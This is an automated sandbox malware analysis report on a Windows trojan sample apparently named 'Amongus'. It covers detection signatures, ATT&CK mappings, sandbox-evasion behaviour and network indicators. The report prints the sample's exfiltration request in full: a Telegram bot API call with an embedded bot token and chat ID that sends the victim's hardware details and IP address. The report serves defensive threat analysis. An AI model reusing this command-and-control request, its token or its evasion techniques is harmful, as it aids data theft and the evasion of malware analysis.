Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xYWm6BV3NZ.exe

Overview

General Information

Sample Name:xYWm6BV3NZ.exe
Analysis ID:567681
MD5:166c72239b76c7f2dcd5cb02138adc42
SHA1:738654027847e49909f1180c147f79c80acb947f
SHA256:013f6b8faad5ceefe26e0817e770031e6df82da64e1b38dc4299b9bf55ba731a
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram Recon
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Uses the Telegram API (likely for C&C communication)
May check the online IP address of the machine
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sample file is different than original file name gathered from version info
May sleep (evasive loops) to hinder dynamic analysis
Binary contains a suspicious time stamp
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • xYWm6BV3NZ.exe (PID: 4400 cmdline: "C:\Users\user\Desktop\xYWm6BV3NZ.exe" MD5: 166C72239B76C7F2DCD5CB02138ADC42)
    • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
xYWm6BV3NZ.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security

    There are no malicious signatures, click here to show all signatures.

    Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke (rule): Data: Image: C:\Users\user\Desktop\xYWm6BV3NZ.exe, QueryName: ip-api.com

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: xYWm6BV3NZ.exeReversingLabs: Detection: 69%
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49758 version: TLS 1.2
    Source: xYWm6BV3NZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
    Source: Binary string: \Amongus\Amongus\obj\Debug\Amongus.pdb source: xYWm6BV3NZ.exe

    Networking

    barindex
    Source: unknownDNS query: name: api.telegram.org
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeDNS query: name: ip-api.com
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: global trafficHTTP traffic detected: GET /bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=1704933594&text=CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%202F7CW8A1%0AIP:%20102.129.143.61 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /line?fields=query HTTP/1.1Host: ip-api.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367818391.00000000031B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367587681.00000000012F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp, xYWm6BV3NZ.exe, 00000000.00000002.367791831.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
    Source: xYWm6BV3NZ.exeString found in binary or memory: http://ip-api.com/line?fields=query
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367800472.0000000003196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com4m(
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367791831.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
    Source: xYWm6BV3NZ.exeString found in binary or memory: https://api.telegram.org/bot
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=17049
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4m
    Source: unknownDNS traffic detected: queries for: ip-api.com
    Source: global trafficHTTP traffic detected: GET /bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=1704933594&text=CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%202F7CW8A1%0AIP:%20102.129.143.61 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /line?fields=query HTTP/1.1Host: ip-api.comConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49758 version: TLS 1.2
    Source: xYWm6BV3NZ.exe, 00000000.00000000.357891321.0000000000C24000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAmongus.exe0 vs xYWm6BV3NZ.exe
    Source: xYWm6BV3NZ.exeBinary or memory string: OriginalFilenameAmongus.exe0 vs xYWm6BV3NZ.exe
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeCode function: 0_2_014D63880_2_014D6388
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeCode function: 0_2_014DA5780_2_014DA578
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeCode function: 0_2_014D6C580_2_014D6C58
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeCode function: 0_2_014D60400_2_014D6040
    Source: xYWm6BV3NZ.exeReversingLabs: Detection: 69%
    Source: xYWm6BV3NZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\xYWm6BV3NZ.exe "C:\Users\user\Desktop\xYWm6BV3NZ.exe"
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_01
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xYWm6BV3NZ.exe.logJump to behavior
    Source: classification engineClassification label: mal68.troj.evad.winEXE@2/1@2/2
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: xYWm6BV3NZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: xYWm6BV3NZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
    Source: xYWm6BV3NZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: \Amongus\Amongus\obj\Debug\Amongus.pdb source: xYWm6BV3NZ.exe
    Source: xYWm6BV3NZ.exeStatic PE information: 0xEC3D810A [Sat Aug 6 07:21:46 2095 UTC]
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe TID: 4624Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exe TID: 4708Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367537088.00000000012BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367537088.00000000012BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareHCTPPLVWWin32_VideoControllerKHXN9NGVVideoController120060621000000.000000-00043896118display.infMSBDA2F7CW8A1PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsR91LPH4R
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367537088.00000000012BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeMemory allocated: page read and write | page guardJump to behavior

    Language, Device and Operating System Detection

    barindex
    Source: Yara matchFile source: xYWm6BV3NZ.exe, type: SAMPLE
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeQueries volume information: C:\Users\user\Desktop\xYWm6BV3NZ.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts111
    Windows Management Instrumentation
    Path Interception1
    Process Injection
    1
    Masquerading
    OS Credential Dumping111
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Web Service
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Disable or Modify Tools
    LSASS Memory131
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
    Encrypted Channel
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
    Virtualization/Sandbox Evasion
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Ingress Tool Transfer
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Process Injection
    NTDS1
    System Network Configuration Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer2
    Non-Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Timestomp
    LSA Secrets13
    System Information Discovery
    SSHKeyloggingData Transfer Size Limits3
    Application Layer Protocol
    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    xYWm6BV3NZ.exe70%ReversingLabsByteCode-MSIL.Trojan.Zilla
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://api.telegram.org4m0%Avira URL Cloudsafe
    http://ip-api.com4m(0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    ip-api.com
    208.95.112.1
    truefalse
      high
      api.telegram.org
      149.154.167.220
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://ip-api.com/line?fields=queryfalse
          high
          https://api.telegram.org/bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=1704933594&text=CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%202F7CW8A1%0AIP:%20102.129.143.61false
            high
            NameSourceMaliciousAntivirus DetectionReputation
            https://api.telegram.org4mxYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ip-api.com4m(xYWm6BV3NZ.exe, 00000000.00000002.367800472.0000000003196000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            low
            https://api.telegram.org/bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=17049xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://api.telegram.orgxYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://api.telegram.org/botxYWm6BV3NZ.exefalse
                  high
                  http://api.telegram.orgxYWm6BV3NZ.exe, 00000000.00000002.367818391.00000000031B9000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexYWm6BV3NZ.exe, 00000000.00000002.367791831.000000000318C000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://ip-api.comxYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp, xYWm6BV3NZ.exe, 00000000.00000002.367791831.000000000318C000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        208.95.112.1
                        ip-api.comUnited States
                        53334TUT-ASUSfalse
                        149.154.167.220
                        api.telegram.orgUnited Kingdom
                        62041TELEGRAMRUfalse
                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:567681
                        Start date:07.02.2022
                        Start time:15:06:05
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 4m 47s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:xYWm6BV3NZ.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal68.troj.evad.winEXE@2/1@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 0.3% (good quality ratio 0.3%)
                        • Quality average: 76%
                        • Quality standard deviation: 13.9%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 5
                        • Number of non-executed functions: 1
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 184.30.21.144, 20.50.102.62
                        • Excluded domains from analysis (whitelisted): e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, arc.trafficmanager.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: xYWm6BV3NZ.exe
                        TimeTypeDescription
                        15:07:14API Interceptor1x Sleep call for process: xYWm6BV3NZ.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        208.95.112.1xYWm6BV3NZ.exeGet hashmaliciousBrowse
                        • ip-api.com/line?fields=query
                        BjEwXjK71p.exeGet hashmaliciousBrowse
                        • ip-api.com/json/
                        WfBayGk51Z.exeGet hashmaliciousBrowse
                        • ip-api.com/json/
                        LZetStOCHC.exeGet hashmaliciousBrowse
                        • ip-api.com/json/
                        Genshin.exeGet hashmaliciousBrowse
                        • ip-api.com/line/?fields=hosting
                        FieroHack.exeGet hashmaliciousBrowse
                        • ip-api.com/line/?fields=hosting
                        ZVHa1EJq8l.exeGet hashmaliciousBrowse
                        • ip-api.com/line?fields=query
                        MERC_PG_MDLS.msiGet hashmaliciousBrowse
                        • ip-api.com/json/
                        vZmynwbic1.exeGet hashmaliciousBrowse
                        • ip-api.com//json/102.129.143.61
                        jtwjXM8aJc.exeGet hashmaliciousBrowse
                        • ip-api.com/json/
                        hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                        • ip-api.com/json/
                        H7LG5mteEK.exeGet hashmaliciousBrowse
                        • ip-api.com/json/
                        XKPppNZNEj.exeGet hashmaliciousBrowse
                        • ip-api.com/json/
                        win-setup-i864.exeGet hashmaliciousBrowse
                        • ip-api.com/json/
                        h1GxqAXOnl.exeGet hashmaliciousBrowse
                        • ip-api.com/json/
                        BAWAG_PSK.apkGet hashmaliciousBrowse
                        • www.ip-api.com/json
                        BAWAG_PSK.apkGet hashmaliciousBrowse
                        • www.ip-api.com/json
                        BAWAG_PSK.apkGet hashmaliciousBrowse
                        • www.ip-api.com/json
                        BAWAG_PSK.apkGet hashmaliciousBrowse
                        • www.ip-api.com/json
                        BAWAG_PSK.apkGet hashmaliciousBrowse
                        • www.ip-api.com/json
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        ip-api.comBjEwXjK71p.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        WfBayGk51Z.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        LZetStOCHC.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        Genshin.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        FieroHack.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        549953D5DB2A4646740E721E24EC1B7FA57EF6C4D72FF.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        ZVHa1EJq8l.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        MERC_PG_MDLS.msiGet hashmaliciousBrowse
                        • 208.95.112.1
                        vZmynwbic1.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        jtwjXM8aJc.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        H7LG5mteEK.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        XKPppNZNEj.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        win-setup-i864.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        h1GxqAXOnl.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        39A6zqpjd1.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        Dekontunuz.xlsGet hashmaliciousBrowse
                        • 208.95.112.1
                        h0VyaNN85i.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        NPk8QDAMBo.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        api.telegram.orgPacking List_pdf.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        xYWm6BV3NZ.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        price.pdf.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        Shipping Documents.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        Jwd5H8TOWY.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        eiUJ75uWf1.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        unicore.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        EbEX5Miwah.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        8TZzjeiIUB.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        33If94Wvzk.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        Incoming_voicemail_vaw.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        ZVHa1EJq8l.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        cpgZGBLR6l.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        vUscUtP.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        New Order.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        mgr.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        splwow32.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        HBL Scan copy.exeGet hashmaliciousBrowse
                        • 149.154.167.220
                        INCOMING_VOICEMAIL_VAW.EXEGet hashmaliciousBrowse
                        • 149.154.167.220
                        IMAGE030222.EXEGet hashmaliciousBrowse
                        • 149.154.167.220
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        TUT-ASUSxYWm6BV3NZ.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        BjEwXjK71p.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        WfBayGk51Z.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        LZetStOCHC.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        Genshin.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        FieroHack.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        549953D5DB2A4646740E721E24EC1B7FA57EF6C4D72FF.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        ZVHa1EJq8l.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        MERC_PG_MDLS.msiGet hashmaliciousBrowse
                        • 208.95.112.1
                        vZmynwbic1.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        jtwjXM8aJc.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        H7LG5mteEK.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        XKPppNZNEj.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        win-setup-i864.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        h1GxqAXOnl.exeGet hashmaliciousBrowse
                        • 208.95.112.1
                        BAWAG_PSK.apkGet hashmaliciousBrowse
                        • 208.95.112.1
                        BAWAG_PSK.apkGet hashmaliciousBrowse
                        • 208.95.112.1
                        BAWAG_PSK.apkGet hashmaliciousBrowse
                        • 208.95.112.1
                        BAWAG_PSK.apkGet hashmaliciousBrowse
                        • 208.95.112.1
                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
